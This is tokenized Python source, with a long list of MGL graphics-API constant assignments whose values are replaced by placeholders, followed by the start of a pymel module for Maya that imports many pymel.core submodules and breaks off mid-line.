<NUM_LIT> <EOL> MGL_CLIP_PLANE1 = <NUM_LIT> <EOL> MGL_OBJECT_VALIDATE_STATUS_ARB = <NUM_LIT> <EOL> MGL_UNSIGNED_BYTE = <NUM_LIT> <EOL> MGL_RGBA_MODE = <NUM_LIT> <EOL> MGL_COLOR_TABLE_FORMAT_EXT = <NUM_LIT> <EOL> MGL_OBJECT_LINK_STATUS_ARB = <NUM_LIT> <EOL> MGL_INDEX_MODE = <NUM_LIT> <EOL> MGL_ABGR_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD17_EXT = <NUM_LIT> <EOL> MGL_OBJECT_COMPILE_STATUS_ARB = <NUM_LIT> <EOL> MGL_MULTISAMPLE_BIT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSED_ARB = <NUM_LIT> <EOL> kMGLext_texture_env_add = <NUM_LIT:12> <EOL> MGL_COLOR_WRITEMASK = <NUM_LIT> <EOL> MGL_COLOR_BUFFER_BIT = <NUM_LIT> <EOL> MGL_DYNAMIC_DRAW_ARB = <NUM_LIT> <EOL> MGL_REG_13_ATI = <NUM_LIT> <EOL> MGL_COLOR_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_OP_MADD_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD15_EXT = <NUM_LIT> <EOL> MGL_OBJECT_SUBTYPE_ARB = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_RECTANGLE = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_render_texture = <NUM_LIT> <EOL> MGL_INDEX_WRITEMASK = <NUM_LIT> <EOL> MGL_ALWAYS = <NUM_LIT> <EOL> MGL_SHADER_OPERATION_NV = <NUM_LIT> <EOL> kMGLext_ARB_texture_rectangle = <NUM_LIT> <EOL> MGL_OBJECT_TYPE_ARB = <NUM_LIT> <EOL> MGL_INDEX_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY3_NV = <NUM_LIT> <EOL> MGL_ACCUM_BUFFER_BIT = <NUM_LIT> <EOL> MGL_PROGRAM_OBJECT_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_SCISSOR_TEST = <NUM_LIT> <EOL> MGL_T4F_V4F = <NUM_LIT> <EOL> MGL_RENDERBUFFER_FREE_MEMORY_ATI = <NUM_LIT> <EOL> MGL_SCISSOR_BOX = <NUM_LIT> <EOL> MGL_CLAMP_TO_EDGE = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD11_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_FREE_MEMORY_ATI = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_BINDING_EXT = <NUM_LIT> <EOL> MGL_READ_BUFFER = <NUM_LIT> <EOL> MGL_VARIABLE_G_NV = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD10_EXT = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_X = <NUM_LIT> <EOL> kMGLext_NV_fence = <NUM_LIT> <EOL> MGL_CLAMP_READ_COLOR = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY = <NUM_LIT> <EOL> MGL_GREATER = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_EVICTED_MEMORY_NVX = <NUM_LIT> <EOL> MGL_NUM_INSTRUCTIONS_TOTAL_ATI = <NUM_LIT> <EOL> MGL_AUX_BUFFERS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD8_EXT = <NUM_LIT> <EOL> MGL_REG_29_ATI = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_EVICTION_COUNT_NVX = <NUM_LIT> <EOL> MGL_CLAMP_VERTEX_COLOR = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY2_NV = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD7_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Y = <NUM_LIT> <EOL> MGL_TEXTURE_FLOAT_COMPONENTS_NV = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_CURRENT_AVAILABLE_VIDMEM_NVX = <NUM_LIT> <EOL> MGL_TEXTURE_MIN_FILTER = <NUM_LIT> <EOL> MGL_RGBA_FLOAT_MODE = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD6_EXT = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_TOTAL_AVAILABLE_MEMORY_NVX = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_ARB = <NUM_LIT> <EOL> kMGLext_blend_subtract = <NUM_LIT> <EOL> MGL_MAX_RECTANGLE_TEXTURE_SIZE = <NUM_LIT> <EOL> MGL_DOT3_RGBA = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD5_EXT = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_DEDICATED_VIDMEM_NVX = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_EXT = <NUM_LIT> <EOL> MGL_BLEND = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD4_EXT = <NUM_LIT> <EOL> MGL_CURRENT_SECONDARY_COLOR_EXT = <NUM_LIT> <EOL> MGL_ORDER = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_INVERT = <NUM_LIT> <EOL> MGL_BLEND_SRC = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_2D = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD3_EXT = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_VALUE = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_FACTOR = <NUM_LIT> <EOL> MGL_BLEND_DST = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD2_EXT = <NUM_LIT> <EOL> MGL_REG_28_ATI = <NUM_LIT> <EOL> MGL_SEPARATE_ATTRIBS_EXT = <NUM_LIT> <EOL> MGL_DITHER = <NUM_LIT> <EOL> MGL_MATRIX23 = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD1_EXT = <NUM_LIT> <EOL> MGL_SAMPLE_BUFFERS = <NUM_LIT> <EOL> MGL_ALPHA_TEST_REF = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_CUBE_MAP = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD0_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_LUMINANCE_SIZE = <NUM_LIT> <EOL> MGL_4D_COLOR_TEXTURE = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT15 = <NUM_LIT> <EOL> MGL_CON_21_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY8_NV = <NUM_LIT> <EOL> MGL_MAX_CLIP_PLANES = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_ONE = <NUM_LIT> <EOL> MGL_SAMPLES = <NUM_LIT> <EOL> kMGLext_frame_buffer_object = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT14 = <NUM_LIT> <EOL> MGL_SCISSOR_BIT = <NUM_LIT> <EOL> MGL_OUTPUT_COLOR0_EXT = <NUM_LIT> <EOL> MGL_COLOR_SUM_EXT = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_COVERAGE = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT13 = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_1D = <NUM_LIT> <EOL> MGL_MAX_EVAL_ORDER = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Y = <NUM_LIT> <EOL> MGL_MULTISAMPLE = <NUM_LIT> <EOL> MGL_REPEAT = <NUM_LIT> <EOL> MGL_RGBA16F = <NUM_LIT> <EOL> MGL_REG_27_ATI = <NUM_LIT> <EOL> MGL_TRANSPOSE_COLOR_MATRIX = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT11 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY0_NV = <NUM_LIT> <EOL> MGL_OP_MULTIPLY_MATRIX_EXT = <NUM_LIT> <EOL> MGL_TRANSPOSE_TEXTURE_MATRIX = <NUM_LIT> <EOL> MGL_EQUAL = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT10 = <NUM_LIT> <EOL> kMGLext_MGLX_choose_fbconfig_sgix = <NUM_LIT> <EOL> MGL_WRITE_ONLY_ARB = <NUM_LIT> <EOL> MGL_OP_CROSS_PRODUCT_EXT = <NUM_LIT> <EOL> MGL_TRANSPOSE_PROJECTION_MATRIX = <NUM_LIT> <EOL> MGL_INTENSITY32F = <NUM_LIT> <EOL> MGL_CON_20_ATI = <NUM_LIT> <EOL> MGL_ALPHA_SCALE = <NUM_LIT> <EOL> MGL_TRANSPOSE_MODELVIEW_MATRIX = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT8 = <NUM_LIT> <EOL> MGL_OP_RECIP_SQRT_EXT = <NUM_LIT> <EOL> MGL_STREAM_COPY_ARB = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_UNITS = <NUM_LIT> <EOL> MGL_RGB32F = <NUM_LIT> <EOL> MGL_TEXTURE_RESIDENT = <NUM_LIT> <EOL> MGL_BLUE_SCALE = <NUM_LIT> <EOL> MGL_CLIENT_ACTIVE_TEXTURE = <NUM_LIT> <EOL> MGL_LUMINANCE16F = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT6 = <NUM_LIT> <EOL> MGL_GREEN_BIAS = <NUM_LIT> <EOL> MGL_BITMAP_TOKEN = <NUM_LIT> <EOL> MGL_ACTIVE_TEXTURE = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT5 = <NUM_LIT> <EOL> MGL_SELECTION_BUFFER_SIZE = <NUM_LIT> <EOL> MGL_GREEN_SCALE = <NUM_LIT> <EOL> MGL_TEXTURE31 = <NUM_LIT> <EOL> MGL_TRANSFORM_BIT = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT4 = <NUM_LIT> <EOL> MGL_ZOOM_Y = <NUM_LIT> <EOL> MGL_FLOAT_RGBA32_NV = <NUM_LIT> <EOL> MGL_MVP_MATRIX_EXT = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT3 = <NUM_LIT> <EOL> MGL_ZOOM_X = <NUM_LIT> <EOL> MGL_CURRENT_VERTEX_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_IMAGE_SIZE_ARB = <NUM_LIT> <EOL> kMGLext_texture_cube_map = <NUM_LIT:11> <EOL> MGL_COLOR_ATTACHMENT2 = <NUM_LIT> <EOL> MGL_RED_BIAS = <NUM_LIT> <EOL> MGL_STREAM_READ_ARB = <NUM_LIT> <EOL> MGL_FULL_RANGE_EXT = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT1 = <NUM_LIT> <EOL> MGL_TEXTURE_PRIORITY = <NUM_LIT> <EOL> MGL_RED_SCALE = <NUM_LIT> <EOL> MGL_NORMALIZED_RANGE_EXT = <NUM_LIT> <EOL> MGL_INTENSITY16F = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT0 = <NUM_LIT> <EOL> MGL_INDEX_OFFSET = <NUM_LIT> <EOL> MGL_REG_25_ATI = <NUM_LIT> <EOL> MGL_NEGATIVE_ONE_EXT = <NUM_LIT> <EOL> MGL_ACCUM = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_BINDING_NV = <NUM_LIT> <EOL> MGL_INDEX_SHIFT = <NUM_LIT> <EOL> MGL_ONE_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_COLOR1_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_UNSUPPORTED = <NUM_LIT> <EOL> MGL_MAP_STENCIL = <NUM_LIT> <EOL> MGL_FLOAT_RGBA16_NV = <NUM_LIT> <EOL> MGL_TEXTURE24 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_READ_BUFFER = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_CUBE_MAP_ARB = <NUM_LIT> <EOL> MGL_MAP_COLOR = <NUM_LIT> <EOL> MGL_NEGATIVE_W_EXT = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_CUBE_MAP_ARB = <NUM_LIT> <EOL> MGL_PACK_ALIGNMENT = <NUM_LIT> <EOL> MGL_STREAM_DRAW_ARB = <NUM_LIT> <EOL> MGL_CLIP_PLANE4 = <NUM_LIT> <EOL> MGL_CLAMP_FRAGMENT_COLOR = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_FORMATS = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_COMBINER1_NV = <NUM_LIT> <EOL> MGL_NEGATIVE_Y_EXT = <NUM_LIT> <EOL> MGL_ALPHA16F = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_DIMENSIONS = <NUM_LIT> <EOL> MGL_COMBINER0_NV = <NUM_LIT> <EOL> MGL_LINE_TOKEN = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD20_EXT = <NUM_LIT> <EOL> MGL_TEXTURE20 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_DUPLICATE_ATTACHMENT = <NUM_LIT> <EOL> MGL_TRACK_MATRIX_TRANSFORM_NV = <NUM_LIT> <EOL> MGL_PACK_ROW_LENGTH = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_X = <NUM_LIT> <EOL> MGL_TEXTURE19 = <NUM_LIT> <EOL> MGL_HINT_BIT = <NUM_LIT> <EOL> MGL_TEXTURE_MAG_FILTER = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_MISSING_ATTACHMENT = <NUM_LIT> <EOL> MGL_PACK_LSB_FIRST = <NUM_LIT> <EOL> MGL_FLOAT_RGB32_NV = <NUM_LIT> <EOL> MGL_TEXTURE18 = <NUM_LIT> <EOL> MGL_REFLECTION_MAP_ARB = <NUM_LIT> <EOL> kMGLext_blend_minmax = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_ATTACHMENT = <NUM_LIT> <EOL> MGL_8X_BIT_ATI = <NUM_LIT:4> <EOL> MGL_MAX_GENERAL_COMBINERS_NV = <NUM_LIT> <EOL> MGL_TEXTURE17 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_COMPLETE = <NUM_LIT> <EOL> MGL_COMBINER_SUM_OUTPUT_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_TEXTURE16 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_TEXTURE_3D_ZOFFSET = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_BINDING_EXT = <NUM_LIT> <EOL> MGL_COMBINER_CD_OUTPUT_NV = <NUM_LIT> <EOL> MGL_DSDT8_MAG8_NV = <NUM_LIT> <EOL> MGL_TEXTURE15 = <NUM_LIT> <EOL> MGL_RGB16F = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_TEXTURE_CUBE_MAP_FACE = <NUM_LIT> <EOL> MGL_COMBINER_AB_OUTPUT_NV = <NUM_LIT> <EOL> MGL_REG_23_ATI = <NUM_LIT> <EOL> MGL_TEXTURE14 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LEVEL = <NUM_LIT> <EOL> MGL_TRACK_MATRIX_NV = <NUM_LIT> <EOL> MGL_MATRIX22 = <NUM_LIT> <EOL> MGL_COMBINER_BIAS_NV = <NUM_LIT> <EOL> MGL_TEXTURE13 = <NUM_LIT> <EOL> MGL_OUTPUT_VERTEX_EXT = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_OBJECT_NAME = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP = <NUM_LIT> <EOL> MGL_COMBINER_SCALE_NV = <NUM_LIT> <EOL> MGL_FLOAT_RGB16_NV = <NUM_LIT> <EOL> MGL_TEXTURE12 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_OBJECT_TYPE = <NUM_LIT> <EOL> MGL_CON_16_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY7_NV = <NUM_LIT> <EOL> MGL_COMBINER_MUX_SUM_NV = <NUM_LIT> <EOL> MGL_MULT = <NUM_LIT> <EOL> kMGLext_SGIS_generate_mipmap = <NUM_LIT> <EOL> MGL_PRIMARY_COLOR = <NUM_LIT> <EOL> MGL_COMBINER_CD_DOT_PRODUCT_NV = <NUM_LIT> <EOL> MGL_WEIGHT_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_ADD = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_BINDING = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_EXT = <NUM_LIT> <EOL> MGL_COMBINER_AB_DOT_PRODUCT_NV = <NUM_LIT> <EOL> MGL_NEVER = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT12 = <NUM_LIT> <EOL> MGL_MAX_RENDERBUFFER_SIZE = <NUM_LIT> <EOL> MGL_COMBINER_COMPONENT_USAGE_NV = <NUM_LIT> <EOL> MGL_REG_22_ATI = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_LOCAL_CONSTANTS_EXT = <NUM_LIT> <EOL> MGL_INTERPOLATE = <NUM_LIT> <EOL> MGL_PROGRAM_RESIDENT_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_R_TO_R_SIZE = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_INVARIANTS_EXT = <NUM_LIT> <EOL> MGL_DEPTH_BIAS = <NUM_LIT> <EOL> MGL_MAX_FRAGMENT_UNIFORM_COMPONENTS_ARB = <NUM_LIT> <EOL> kMGLext_MGLX_create_pbuffer_sgix = <NUM_LIT> <EOL> MGL_COMBINER_INPUT_NV = <NUM_LIT> <EOL> MGL_INTENSITY = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_VARIANTS_EXT = <NUM_LIT> <EOL> MGL_PASS_THROUGH_TOKEN = <NUM_LIT> <EOL> MGL_FRAGMENT_SHADER_ARB = <NUM_LIT> <EOL> MGL_NORMAL_MAP_ARB = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_B_SIZE = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_INSTRUCTIONS_EXT = <NUM_LIT> <EOL> MGL_OPERAND2_ALPHA = <NUM_LIT> <EOL> MGL_SCALE_BY_ONE_HALF_NV = <NUM_LIT> <EOL> MGL_FRAGMENT_DEPTH_EXT = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_LOCALS_EXT = <NUM_LIT> <EOL> MGL_STENCIL_BUFFER_BIT = <NUM_LIT> <EOL> MGL_OPERAND1_ALPHA = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_1D = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_R_SIZE = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_LOCAL_CONSTANTS_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE_ALPHA32F = <NUM_LIT> <EOL> MGL_OPERAND0_ALPHA = <NUM_LIT> <EOL> kMGLext_NV_float_buffer = <NUM_LIT> <EOL> MGL_PIXEL_MAP_S_TO_S_SIZE = <NUM_LIT> <EOL> MGL_COMPRESSED_INTENSITY = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_INVARIANTS_EXT = <NUM_LIT> <EOL> kMGLext_NUMBER_OF_EXTENSIONS = <NUM_LIT> <EOL> MGL_OPERAND2_RGB = <NUM_LIT> <EOL> MGL_TEXTURE_2D = <NUM_LIT> <EOL> MGL_SIGNED_NEGATE_NV = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_VARIANTS_EXT = <NUM_LIT> <EOL> MGL_DEPTH_SCALE = <NUM_LIT> <EOL> MGL_OPERAND1_RGB = <NUM_LIT> <EOL> MGL_SIGNED_IDENTITY_NV = <NUM_LIT> <EOL> MGL_FLOAT_RG16_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_4 = <NUM_LIT> <EOL> MGL_OPERAND0_RGB = <NUM_LIT> <EOL> MGL_CON_14_ATI = <NUM_LIT> <EOL> MGL_HALF_BIAS_NEGATE_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_3 = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSION_HINT_ARB = <NUM_LIT> <EOL> kMGLext_texture_compression = <NUM_LIT:10> <EOL> MGL_SOURCE2_ALPHA = <NUM_LIT> <EOL> MGL_HALF_BIAS_NORMAL_NV = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_LOCAL_CONSTANT_EXT = <NUM_LIT> <EOL> MGL_SOURCE1_ALPHA = <NUM_LIT> <EOL> MGL_EXPAND_NEGATE_NV = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_3 = <NUM_LIT> <EOL> MGL_LUMINANCE32F = <NUM_LIT> <EOL> MGL_SOURCE0_ALPHA = <NUM_LIT> <EOL> MGL_EXPAND_NORMAL_NV = <NUM_LIT> <EOL> MGL_REG_20_ATI = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_2 = <NUM_LIT> <EOL> MGL_TEXTURE_1D = <NUM_LIT> <EOL> MGL_UNSIGNED_INVERT_NV = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_1 = <NUM_LIT> <EOL> MGL_MATRIX16 = <NUM_LIT> <EOL> MGL_MAX_FRAGMENT_PROGRAM_LOCAL_PARAMETERS_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_SOURCE1_RGB = <NUM_LIT> <EOL> MGL_UNSIGNED_IDENTITY_NV = <NUM_LIT> <EOL> MGL_FLOAT_R32_NV = <NUM_LIT> <EOL> MGL_MAP2_NORMAL = <NUM_LIT> <EOL> MGL_SOURCE0_RGB = <NUM_LIT> <EOL> MGL_INCR_WRAP_EXT = <NUM_LIT> <EOL> MGL_SPARE0_PLUS_SECONDARY_COLOR_NV = <NUM_LIT> <EOL> MGL_SCALAR_EXT = <NUM_LIT> <EOL> MGL_DST_COLOR = <NUM_LIT> <EOL> MGL_COMBINE_ALPHA = <NUM_LIT> <EOL> MGL_E_TIMES_F_NV = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_SIZE_NV = <NUM_LIT> <EOL> MGL_ONE_MINUS_SRC_COLOR = <NUM_LIT> <EOL> MGL_COMBINE_RGB = <NUM_LIT> <EOL> MGL_DISCARD_NV = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_4 = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT9 = <NUM_LIT> <EOL> MGL_COMBINE = <NUM_LIT> <EOL> MGL_SPARE1_NV = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD19_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_3 = <NUM_LIT> <EOL> MGL_REG_30_ATI = <NUM_LIT> <EOL> MGL_TEXTURE10 = <NUM_LIT> <EOL> MGL_SPARE0_NV = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_4 = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT24_ARB = <NUM_LIT> <EOL> MGL_CLAMP_TO_BORDER = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_NV = <NUM_LIT> <EOL> MGL_FLOAT_R16_NV = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_3 = <NUM_LIT> <EOL> MGL_MAP2_COLOR_4 = <NUM_LIT> <EOL> kMGLext_blend_color = <NUM_LIT> <EOL> MGL_COMPRESSED_TEXTURE_FORMATS = <NUM_LIT> <EOL> MGL_CLIENT_ALL_ATTRIB_BITS = - <NUM_LIT:1> <EOL> MGL_VARIABLE_D_NV = <NUM_LIT> <EOL> MGL_PRIMARY_COLOR_NV = <NUM_LIT> <EOL> MGL_TEXTURE_STACK_DEPTH = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_2 = <NUM_LIT> <EOL> MGL_DRAW_PIXEL_TOKEN = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR1_NV = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_1 = <NUM_LIT> <EOL> MGL_REG_26_ATI = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR0_NV = <NUM_LIT> <EOL> MGL_MAP1_NORMAL = <NUM_LIT> <EOL> MGL_ALPHA32F = <NUM_LIT> <EOL> MGL_BITMAP = <NUM_LIT> <EOL> MGL_POLYGON_TOKEN = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSION_HINT = <NUM_LIT> <EOL> MGL_3D = <NUM_LIT> <EOL> MGL_MAP1_INDEX = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_REG_24_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_NV = <NUM_LIT> <EOL> MGL_VARIABLE_F_NV = <NUM_LIT> <EOL> MGL_MAP1_COLOR_4 = <NUM_LIT> <EOL> MGL_MATRIX14 = <NUM_LIT> <EOL> MGL_CON_4_ATI = <NUM_LIT> <EOL> MGL_POINT_TOKEN = <NUM_LIT> <EOL> MGL_REFLECTION_MAP = <NUM_LIT> <EOL> MGL_NOTEQUAL = <NUM_LIT> <EOL> MGL_FLOAT_RGBA_NV = <NUM_LIT> <EOL> MGL_3D_COLOR = <NUM_LIT> <EOL> MGL_OP_MOV_EXT = <NUM_LIT> <EOL> MGL_AUTO_NORMAL = <NUM_LIT> <EOL> MGL_COMPRESSED_RGB = <NUM_LIT> <EOL> MGL_DOT3_RGBA_ARB = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY6_NV = <NUM_LIT> <EOL> MGL_CLIP_PLANE3 = <NUM_LIT> <EOL> MGL_ONE_MINUS_SRC_ALPHA = <NUM_LIT> <EOL> MGL_NAME_STACK_DEPTH = <NUM_LIT> <EOL> MGL_REG_21_ATI = <NUM_LIT> <EOL> MGL_READ_ONLY_ARB = <NUM_LIT> <EOL> MGL_RIGHT = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA_S3TC_DXT3_EXT = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_STRIDE_NV = <NUM_LIT> <EOL> MGL_MAD_ATI = <NUM_LIT> <EOL> MGL_3D_COLOR_TEXTURE = <NUM_LIT> <EOL> MGL_CON_0_ATI = <NUM_LIT> <EOL> MGL_UNPACK_IMAGE_HEIGHT_EXT = <NUM_LIT> <EOL> MGL_FOG_END = <NUM_LIT> <EOL> MGL_ACCUM_BLUE_BITS = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT7 = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE = <NUM_LIT> <EOL> MGL_DRAW_FRAMEBUFFER = <NUM_LIT> <EOL> MGL_REG_17_ATI = <NUM_LIT> <EOL> MGL_ACCUM_GREEN_BITS = <NUM_LIT> <EOL> MGL_REG_18_ATI = <NUM_LIT> <EOL> MGL_TEXTURE8 = <NUM_LIT> <EOL> MGL_READ_FRAMEBUFFER = <NUM_LIT> <EOL> MGL_ACCUM_RED_BITS = <NUM_LIT> <EOL> MGL_POINT_DISTANCE_ATTENUATION_ARB = <NUM_LIT> <EOL> MGL_NAND = <NUM_LIT> <EOL> MGL_MAX_CUBE_MAP_TEXTURE_SIZE = <NUM_LIT> <EOL> kMGLext_MGLX_destroy_pbuffer = <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import pymel . core . context as context <EOL> import maya <EOL> import pymel . core . rendering as rendering <EOL> import maya . cmds as cmds <EOL> import pymel . util as util <EOL> import pymel . core . runtime as runtime <EOL> import pymel . api as api <EOL> import pymel . core . system as system <EOL> import pymel . core . uitypes as ui <EOL> import pymel . core . uitypes as uitypes <EOL> import pymel . core . nodetypes as nodetypes <EOL> import pymel . core . nodetypes as nt <EOL> import pymel . core . animation as animation <EOL> import pymel . core . datatypes as dt <EOL> import pymel . core . language as language <EOL> import pymel . core . windows as windows <EOL> import pymel . core . modeling as modeling <EOL> import pymel . core . effects as effects <EOL> from pymel . core . general import * <EOL> from pymel . core . system import * <EOL> from pymel . core . windows import * <EOL> from pymel . core . animation import * <EOL> from pymel . core . context import * <EOL> from pymel . core . modeling import * <EOL> from pymel . core . other import * <EOL> from pymel . core . rendering import * <EOL> from pymel . core . effects import * <EOL> from pymel . core . language import Env <EOL> from pymel . core . language import callbacks <EOL> from pymel . core . language import MelConversionError <EOL> from pymel . core . language import MelError <EOL> from pymel . core . language import Mel <EOL> from pymel . core . language import evalNoSelectNotify <EOL> from pymel . core . language import Catch <EOL> from pymel . core . language import getProcArguments <EOL> from pymel . core . language import pythonToMel <EOL> from pymel . core . language import stackTrace <EOL> from pymel . core . language import resourceManager <EOL> from 